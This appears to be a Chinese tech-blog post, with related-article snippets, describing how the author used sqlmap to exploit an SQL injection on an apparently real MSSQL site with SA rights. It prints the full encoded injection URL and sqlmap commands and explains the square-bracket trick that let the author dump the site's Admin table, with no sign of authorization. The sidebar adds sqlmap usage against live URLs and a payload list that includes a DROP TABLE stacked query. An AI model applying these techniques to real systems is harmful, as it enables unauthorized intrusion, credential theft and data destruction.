sqlmap注入检测经验0x01

最新推荐文章于 2024-05-28 23:33:06 发布
最新推荐文章于 2024-05-28 23:33:06 发布
阅读量358 收藏 1
点赞数
文章标签: python 数据库
本文记录了一次使用SQLMap进行SQL注入攻击的过程,包括解决数据库名和表名被误解析为参数的问题,通过调整SQLMap参数及手动修改payload最终成功获取数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某日偶遇一SQLInjection Point,MSSQL 2008,已开启显错模式。
马上扔进SQLMap跑,一路顺畅,竟然还是SA的权限,心想运气真好,无论如何都拿定了。
数据库,表,列都列出来了,但是上–dump参数就死活跑不出来。
报错 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’”——x是马赛克哈:)
心想应该很容易搞定,遂查找手工注入方法,测试无果。
还是回到SQLMap,-h查看帮助,发现-v 参数可以指定输出详细度,开到-v 3,发现显示了payload,一不做二不休,直接开到-v 5,发现提供了整个http请求,怪不得报错,原来都是返回500,用firefox打开完整payload,说是语法错误。

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20AND%204416%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%2BCHAR%28119%29%2BCHAR%28100%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28*%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%222012_xxxx%22..syscolumns%2C2012_xxxx..sysobjects%20WHERE%202012_xxxx..syscolumns.id%3D2012_xxxx..sysobjects.id%20AND%202012_xxxx..sysobjects.name%3DCHAR%2884%29%2BCHAR%2866%29%2BCHAR%2895%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28104%29%2BCHAR%28113%29%29%29

显然是2012的问题,也就是应该是错把库名中的数字错当成参数了

在URL的库名加上双引号包裹,果然就可以爆出数据了。

问题又来了,要我手工爆数据我可搞不定,还是要回到SQLMap啊,意思是要想办法把库名包裹起来,不让系统把它解析成一个参数

XTEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 –dump -D”‘2012_xxxx” -T’Admin’

这次好一点了,还是报错unable to retrieve column names for table ‘Admin’ in database ‘”2012_xxxx”‘,意思是有返回了,但是库名不对。

XTEST12 ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218  –dump -D”[2012_xxxx]” -T’Admin’

我也不记得哪来的灵机一动,改用中括号包裹,果然就成功了,dump出整个表了。

XCONCLUSION:在使用SQLMap时可以使用-v参数指定输出详细度,然后直接用浏览器查看payload,确定语法错误点后想办法改进。在遇到系统误判库名表名是可用中括号包裹名字。
SQL注入漏洞之sqlmap自动注入
XZZbh的博客
09-19 719
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
sqlmap 自动注入 -01
shenghuiping2001的专栏
01-21 1185
sqlmap 很强大的功能就是自动注入,然后可以检测出对方的OS, mysql 的版本,--batch 的参数是免交互。
sqlmap使用
m0_46617336的博客
10-05 6636
渗透测试工具之sqlmap——简单应用渗透测试工具之sqlmap工具介绍应用环境整型溢出判断是否存在注入数据库表名列名取值总结 渗透测试工具之sqlmap 工具介绍 一款开源的SQL注入工具,适用于win和kali(本文使用debian)。现在使用最新版sqlmap,通过安装可以实现在Python3的环境里运行。 应用环境 CTFHub平台中的SQL注入相关题目 链接:https://www.ctfhub.com 整型溢出 判断是否存在注入 sqlmap -u http://challenge-4d
网站被攻击扫描SQL注入的日常记录
weixin_30339969的博客
04-23 673
我发了个博客,泄露了域名之后,便有人疯狂的尝试攻击我的站点,奈何我防守做得比较好,直接把网段封了,看到403还锲而不舍,我真是想给他颁奖了 查看ua,发现很多sqlmap的ua,肯定会是被刷了,只是运气比较好,没突破防守 日志记录里边出现这条,经过查阅,是注入攻击 %29%3BSELECT%20PG_SLEEP%285%29 原文在这里 https://www.ji...
sqli-labs提示和答案(含详细教程)
superprintf的博客
10-02 1847
前四关登录成功显示用户名,报错正常 第一关id=‘1’ 第二关id=1 第三关id=(‘1’) 第四关id=(“1”) 第五关和六关登录成功不显示用户名,报错正常 第五关id=‘1’ 第六关id=“1” 第七关登录成功不显示用户名,报错固定为You have an error in your SQL syntax 第七关id=((‘1’)) 第八关登录成功不显示用户名,不报错 第八关id=‘1’ 第九关登录成功或者失败只显示You are in… ...
SQL注入SQLmap入门
Shellcode.Cool!
04-18 974
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/和http://sqlmap.org/ SQLmap的作者是谁
记录一次SQL注入src挖掘过程
m0_62584974的博客
09-29 1622
记录挖洞小白的一次SQL注入挖洞经历
SQLMAP 注入教程
General的 优快云 博客
11-15 5590
SQLMAP SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2数据库管理系统。 当给SQLMAP这么一个url的时候,它会: 判断可注入的参数 判断可以用那种SQL 注入技术来注入 识别出哪种数据
Sqlmap速查表/功能移植/Python批量检测SQL注入
浪子燕青的博客
03-11 1656
title: Sqlmap速查表与Python进行功能移植 copyright: true top: 0 date: 2021-02-27 11:59:00 tags: [扫描注入,注入,sqlmap] categories: 安全开发 permalink: password: keywords: description: Sqlmap速查,对其WAF识别功能移植,对其Sql注入的payload进行移植,完成Python批量检测SQL注入。 今天的剑桥对我而言只是一百年前那个剑桥的幻影,但我还会不由自主.
19-OWASP top10--SQL注入(四、sqlmap安装及Sqlmap高级使用及注入防范)
XLbb的博客
05-28 1062
4”同时显示HTTP请求;紧跟其后的 "c://lan//1.txt" 是指定要读取的文件路径。动态页面:用ASP、PHP、JSP、ASP.net、Perl、或CGI等编程语言制作,不是独立存在于服务器上的网页文件,只有当用户请求时服务器才返回一个完整的网页,内容存在于数据库中,根据用户发出的不同请求,其提供个性化的网页内容。静态页面:静态页面的URL链接是以.html、htm、.shtml、.xml为链接后缀,存在于服务器上的一个文件,每个网页都是一个独立的文件,内容直接保存在文件中,没有连接数据库
解决sqlmap报错:[CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
热门推荐
茶花语的博客
03-11 2万+
解决sqlmap报错:[CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
DVWA(linux下)利用sqlmap进行--os-shell注入不能成功的错误处理
Spwpun的博客
11-16 1万+
报错情况: 我在自己的kali linux虚拟机下面安装了DVWA渗透测试系统以便自己进行渗透测试的基础学习,在进行sqli(sql injection)-low级别的测试的时候,利用sqlmap进行注入,加上–os-shell参数获取shell(即系统下的命令行,windows下的cmd,linux下的terminal),发现不能执行。 最后总是报这样的错,unable to uploa...
sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 3012
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
关于mysql数据库操作jdbc中unable to resolve table 表名 红的问题解决
Gavin
09-08 2972
先看问题所在------红但是并不是错误,可以不用管他,如果看着不舒服可以按照下面的步骤------ 根据提示说是要添加数据源, 单击打开database,单击+ 号,data source,选择mysql 当然你也可以选择者驱动和数据源一块添加; 进入如下界面,选择你当前在用的mysql对应的版本5.1之后的选mysql之前的选mysql5.1 接着单击 左上角 + 号, 选择 mysql, general 输入Host ,user,password ,以及要连
简单的sql注入之2WP
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 8247
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
sqlmap 用法
安全小站
09-20 3294
sqlmap用法 【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url”  -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信
sqlmap写文件为空之谜
weixin_33859665的博客
05-08 1003
恰逢有一个SQL注入可以通过sqlmap进行,而且权限高得离谱,直接就是root权限。既然是root权限当然是想直接getshell咯。可是只是sqlmap -u xxx --os-shell的时候却失败了 $ sqlmap -u 'http://php.0day5.com/login.php' --data='user=josh&pass=pass' --o...
sqlmap注入所有payload
最新发布
03-13
<think>嗯,用户想要获取sqlmap中所有的SQL注入payload列表。首先,我需要回忆一下sqlmap的相关知识,以及它的payload管理方式。 记得sqlmap是一个开源的渗透测试工具,主要用于自动化检测和利用SQL注入漏洞。它的payloads是存储在特定的XML文件里的。比如,用户提到的引用[5]里提到,payload存放在xml/payloads.xml中,而且用户可以根据格式添加自己的payload。所以,用户可能需要找到这个文件来查看所有payload。 不过,用户可能需要更直接的列表,而不是自己去翻代码。但根据引用[5],sqlmap的payload分为不同测试类型和风险等级,比如布尔盲注、时间盲注、联合查询注入等。每个类型可能有多个payload变体,还可能根据数据库类型不同而不同,比如MySQL、Oracle等。 用户的需求可能不仅仅是列表,还可能是如何使用这些payload或者如何自定义。比如引用[4]提到sqlmapPython安装,而引用[2]和[5]提到了如何结合Burp使用以及payload的等级设置。因此,在回答时需要说明payload的位置、结构以及如何查看和修改。 另外,用户可能没有意识到直接获取所有payload的复杂性,因为它们是动态生成的,并且根据测试情境调整。因此需要解释sqlmap的工作机制,比如自动选择payload,而手动获取可能需要访问其GitHub仓库或查看文档。 还要注意引用中的信息,比如引用[1]的SQL_Injection_Payload项目可能包含一些payload示例,但sqlmap自身的payload更系统化。需要区分两者,避免混淆。 最后,用户可能需要相关的问题建议,比如如何自定义payload,如何测试特定类型的注入,或者sqlmap的高级用法。这些问题可以帮助用户进一步深入。</think>关于sqlmap中SQL注入payload的获取与使用,以下是关键信息整理: ### 一、sqlmap payload存储机制 1. **核心文件位置** sqlmap的payload定义文件存储在`xml/payloads.xml`中,该文件按注入类型分类(如布尔盲注、时间盲注、UNION查询等)[^5] 2. **动态生成特性** payload会根据目标数据库类型(MySQL/Oracle/MSSQL等)自动适配,实际发送的payload是基础模板与数据库特定语法的组合[^3] 3. **风险等级控制** 通过`--level`参数(1-5级)控制payload复杂度,高级别包含更多边界测试用例 ### 二、获取payload的三种方式 1. **直接查看源码文件** 访问sqlmap的GitHub仓库(https://github.com/sqlmapproject/sqlmap),查看`xml/`目录下的payload定义文件[^1] 2. **调试模式输出** 执行命令时添加`-v 3`参数,可显示所有测试payload: ```bash sqlmap -u "http://target.com?id=1" -v 3 ``` 3. **历史记录追溯** Windows系统下成功注入的URL会保存在: ``` C:\Users\[用户名]\.sqlmap\output ``` 包含实际使用的payload样本[^2] ### 三、payload自定义方法 1. 在`xml/payloads.xml`中添加自定义payload节段: ```xml <test> <title>Custom Time-Based Payload</title> <stype>2</stype> <!-- 注入类型代码 --> <level>3</level> <!-- 生效等级 --> <clause>1</clause> <!-- 适用语句位置 --> <where>1</where> <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:5'</vector> <request> <payload>IF([RANDNUM]=[RANDNUM] WAITFOR DELAY '[SLEEPTIME]'-- </payload> </request> </test> ``` ### 四、典型payload示例(MySQL) | 注入类型 | 示例payload | |----------------|----------------------------------------------------------------------------| | 布尔盲注 | `' OR [RANDNUM]=[RANDNUM] AND '[RANDSTR]'='[RANDSTR]` | | 时间盲注 | `' OR SLEEP([SLEEPTIME]) AND '[RANDSTR]'='[RANDSTR]` | | UNION注入 | `' UNION ALL SELECT [COLUMN],[COLUMN] FROM [TABLE]-- -` | | 报错注入 | `' AND GTID_SUBSET(CONCAT(0x7e,(SELECT USER()),0x7e),1)-- -` | | 堆叠查询 | `'; DROP TABLE users-- -` |
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值